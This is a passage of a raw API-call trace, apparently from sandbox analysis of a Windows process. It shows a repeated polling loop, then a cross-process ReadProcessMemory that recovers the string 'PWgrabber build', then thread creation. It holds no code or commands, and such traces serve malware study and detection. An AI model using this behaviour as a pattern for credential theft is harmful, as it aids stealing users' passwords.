GetTickCount () returned 0x2063c4e [0178.831] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c8d0 | out: hHeap=0x2150000) returned 1 [0178.831] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.833] GetTickCount () returned 0x20644e4 [0178.833] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.833] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.834] GetTickCount () returned 0x20644e4 [0178.834] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cbd0 [0178.834] GetTickCount () returned 0x20644e4 [0178.834] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cbd0 | out: hHeap=0x2150000) returned 1 [0178.834] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.837] GetTickCount () returned 0x2064d8a [0178.837] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.837] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.838] GetTickCount () returned 0x2064d8a [0178.838] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cae0 [0178.838] GetTickCount () returned 0x2064d8a [0178.838] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cae0 | out: hHeap=0x2150000) returned 1 [0178.838] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.841] GetTickCount () returned 0x2065620 [0178.841] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.841] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.841] GetTickCount () returned 0x2065620 [0178.841] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0178.841] GetTickCount () returned 0x2065620 [0178.841] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0178.841] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.844] GetTickCount () returned 0x2065eb6 [0178.844] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.844] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.845] GetTickCount () returned 0x2065eb6 [0178.845] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0178.845] GetTickCount () returned 0x2065eb6 [0178.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0178.845] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.847] GetTickCount () returned 0x206674c [0178.847] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.847] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.848] GetTickCount () returned 0x206674c [0178.848] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0178.848] GetTickCount () returned 0x206674c [0178.848] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0178.848] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.850] GetTickCount () returned 0x2066fe2 [0178.850] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.850] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.851] GetTickCount () returned 0x2066fe2 [0178.851] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0178.851] GetTickCount () returned 0x2066fe2 [0178.851] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0178.851] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.854] GetTickCount () returned 0x2067887 [0178.854] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.855] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.855] GetTickCount () returned 0x2067887 [0178.855] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0178.855] GetTickCount () returned 0x2067887 [0178.855] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0178.855] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.858] GetTickCount () returned 0x206811d [0178.858] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.858] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.858] GetTickCount () returned 0x206811d [0178.858] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0178.858] GetTickCount () returned 0x206811d [0178.858] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0178.858] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.877] GetTickCount () returned 0x20689c3 [0178.877] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.877] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.877] GetTickCount () returned 0x20689c3 [0178.877] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0178.877] GetTickCount () returned 0x20689c3 [0178.877] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0178.877] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0178.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.908] GetTickCount () returned 0x2069278 [0178.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0178.908] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0178.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41c40 [0178.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32747620 [0178.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32a44010 [0178.908] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0178.908] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f220, lpBuffer=0x32747620, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32747620*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0178.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32747620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0178.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e20 [0178.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32747620, cbMultiByte=-1, lpWideCharStr=0x32e49e20, cchWideChar=5 | out: lpWideCharStr="VERS") returned 5 [0178.909] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613320, lpBuffer=0x32a44010, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44010*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0178.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44010, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0178.916] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e41310 [0178.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44010, cbMultiByte=-1, lpWideCharStr=0x32e41310, cchWideChar=37 | out: lpWideCharStr="PWgrabber build Aug 31 2021 14:49:07") returned 37 [0178.916] SetEvent (hEvent=0x1b4) returned 1 [0178.917] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32747620 | out: hHeap=0x2150000) returned 1 [0178.917] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44010 | out: hHeap=0x2150000) returned 1 [0178.917] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41c40 | out: hHeap=0x2150000) returned 1 [0178.917] GetTickCount () returned 0x2069278 [0178.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0178.917] GetTickCount () returned 0x2069278 [0178.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ccf0 [0178.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41c40 [0178.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e80 [0178.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e412d0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x136c) returned 0x5ec [0178.918] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e80 | out: hHeap=0x2150000) returned 1 [0178.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.939] GetTickCount () returned 0x2069b2e [0178.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0178.939] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.939] GetTickCount () returned 0x2069b2e [0178.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0178.939] GetTickCount () returned 0x2069b2e [0178.939] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0178.939] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0178.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.958] GetTickCount () returned 0x206a3d3 [0178.958] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0178.958] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0178.958] GetTickCount () returned 0x206a3d3 [0178.958] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0178.958] GetTickCount () returned 0x206a3d3 [0178.958] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0178.958] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0178.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0178.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.002] GetTickCount () returned 0x206ac98 [0179.002] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.002] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.002] GetTickCount () returned 0x206ac98 [0179.002] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0179.002] GetTickCount () returned 0x206ac98 [0179.002] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c3f0 | out: hHeap=0x2150000) returned 1 [0179.002] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.023] GetTickCount () returned 0x206b54d [0179.024] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.024] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.024] GetTickCount () returned 0x206b54d [0179.024] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c690 [0179.024] GetTickCount () returned 0x206b54d [0179.024] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c690 | out: hHeap=0x2150000) returned 1 [0179.024] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.056] GetTickCount () returned 0x206be03 [0179.056] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.056] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.056] GetTickCount () returned 0x206be03 [0179.056] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0179.056] GetTickCount () returned 0x206be03 [0179.056] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0179.056] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.059] GetTickCount () returned 0x206c699 [0179.059] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.060] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.060] GetTickCount () returned 0x206c699 [0179.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0179.060] GetTickCount () returned 0x206c699 [0179.060] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0179.060] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.092] GetTickCount () returned 0x206cf4e [0179.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.092] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.092] GetTickCount () returned 0x206cf4e [0179.092] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0179.092] GetTickCount () returned 0x206cf4e [0179.092] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0179.093] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.123] GetTickCount () returned 0x206d803 [0179.123] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.124] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.124] GetTickCount () returned 0x206d803 [0179.124] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0179.124] GetTickCount () returned 0x206d803 [0179.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0179.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.155] GetTickCount () returned 0x206e0b8 [0179.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.155] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.155] GetTickCount () returned 0x206e0b8 [0179.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cae0 [0179.155] GetTickCount () returned 0x206e0b8 [0179.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cae0 | out: hHeap=0x2150000) returned 1 [0179.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.160] GetTickCount () returned 0x206e94e [0179.160] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.160] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.160] GetTickCount () returned 0x206e94e [0179.160] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ca20 [0179.160] GetTickCount () returned 0x206e94e [0179.161] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ca20 | out: hHeap=0x2150000) returned 1 [0179.161] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.193] GetTickCount () returned 0x206f204 [0179.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.193] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.193] GetTickCount () returned 0x206f204 [0179.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0179.193] GetTickCount () returned 0x206f204 [0179.193] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0179.193] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.224] GetTickCount () returned 0x206fab9 [0179.224] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.224] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.224] GetTickCount () returned 0x206fab9 [0179.224] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c8d0 [0179.224] GetTickCount () returned 0x206fab9 [0179.224] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c8d0 | out: hHeap=0x2150000) returned 1 [0179.225] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.255] GetTickCount () returned 0x207036e [0179.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.255] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.255] GetTickCount () returned 0x207036e [0179.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c360 [0179.256] GetTickCount () returned 0x207036e [0179.256] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c360 | out: hHeap=0x2150000) returned 1 [0179.256] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.260] GetTickCount () returned 0x2070c14 [0179.260] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.260] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.260] GetTickCount () returned 0x2070c14 [0179.260] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0179.260] GetTickCount () returned 0x2070c14 [0179.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0179.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.298] GetTickCount () returned 0x20714c9 [0179.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.298] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.298] GetTickCount () returned 0x20714c9 [0179.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cbd0 [0179.298] GetTickCount () returned 0x20714c9 [0179.298] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cbd0 | out: hHeap=0x2150000) returned 1 [0179.298] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.328] GetTickCount () returned 0x2071d7e [0179.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.328] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.328] GetTickCount () returned 0x2071d7e [0179.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0179.328] GetTickCount () returned 0x2071d7e [0179.328] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0179.328] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.433] GetTickCount () returned 0x2072682 [0179.433] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.433] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.433] GetTickCount () returned 0x2072682 [0179.433] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d020 [0179.433] GetTickCount () returned 0x2072682 [0179.433] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6d020 | out: hHeap=0x2150000) returned 1 [0179.433] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.503] GetTickCount () returned 0x2072f56 [0179.503] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.503] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.503] GetTickCount () returned 0x2072f56 [0179.503] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6edf0 [0179.503] GetTickCount () returned 0x2072f56 [0179.503] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6edf0 | out: hHeap=0x2150000) returned 1 [0179.503] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.574] GetTickCount () returned 0x207383a [0179.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41a50 [0179.574] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0179.574] GetTickCount () returned 0x207383a [0179.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fb40 [0179.574] GetTickCount () returned 0x207383a [0179.574] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fb40 | out: hHeap=0x2150000) returned 1 [0179.574] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0179.629] NtDelayExecution (Alertable=0, 